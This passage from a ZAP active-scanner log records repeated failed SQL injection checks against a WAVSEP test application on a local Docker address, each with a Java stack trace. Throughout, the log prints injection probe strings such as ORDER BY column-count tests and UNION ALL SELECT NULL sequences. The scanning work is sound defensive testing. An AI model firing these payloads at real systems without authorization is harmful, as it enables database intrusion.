org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682215 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682216 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1613-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1613-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682217 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682217 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682218 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 4795-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') ORDER BY 4795-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682219 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682219 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682220 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682220 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682229 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682230 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682231 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682232 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at 